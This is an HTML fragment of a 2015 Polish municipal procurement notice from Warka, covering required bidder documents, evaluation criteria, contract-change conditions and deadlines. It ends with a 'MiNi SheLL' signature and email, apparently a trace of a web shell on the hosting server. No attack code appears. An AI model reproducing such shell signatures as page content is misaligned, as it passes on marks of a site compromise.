<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę (pełnomocnictwo), 
      o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych w 
      oryginale lub kopii poświadczonej przez notariusza.
2)	Oświadczenie o spełnianiu warunków określonych w art. 22. ust.1 ustawy Pzp - wg załącznika nr 2 do SIWZ
3)	Formularz oferty wg wzoru - Załącznik nr 1 do SIWZ.
4)	Kosztorys ofertowy sporządzony wg załącznika (zał. nr 10).
5)	Wykaz rozwiązań równoważnych wg Załącznika nr 6 - w przypadku ich zastosowania.
6)	Dokumenty potwierdzające, że urządzenia równoważne pracują na innych obiektach przez okres nie krótszy niż 2 lata potwierdzone przez Wykonawcę za zgodność z oryginałem (np.: referencje, protokoły odbioru końcowego itp.) - w przypadku zastosowania urządzeń równoważnych w złożonej ofercie.
7)	W przypadku składania oferty przez konsorcjum, niezbędne będzie złożenie pełnomocnictwa w oryginale lub kopii poświadczonej przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w   przypadkach określonych ustawą Pzp oraz zapisami w niniejszej SIWZ i w jej załącznikach w następujących przypadkach:
a)	  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu 
             zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te 
             zmiany są korzystne dla Zamawiającego,
b)	 z powodu wystąpienia dodatkowych, a nie możliwych do przewidzenia przed 
             zawarciem umowy przez doświadczonego Wykonawcę, robót,
c)	  z powodu wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy lub protokole konieczności i musi być potwierdzony przez inspektora nadzoru,
d)	  z powodu okoliczności siły wyższej, np. wystąpieniem zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
e)	  z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
f)	  z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych 
polegających na niezgodności dokumentacji z przepisami prawa,


Warunki dokonywania zmian: 
     -  inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
     - uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     -  forma pisemna pod rygorem nieważności w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.warka.pl/zp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl. St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, do upływu terminu składania ofert - informacja w BIURZE OBSŁUGI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2015 godzina 12:00, miejsce: Urząd Miejski w Warce, pl. Stefana Czarnieckiego 1, 05-660 Warka w BIURZE OBSŁUGI.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com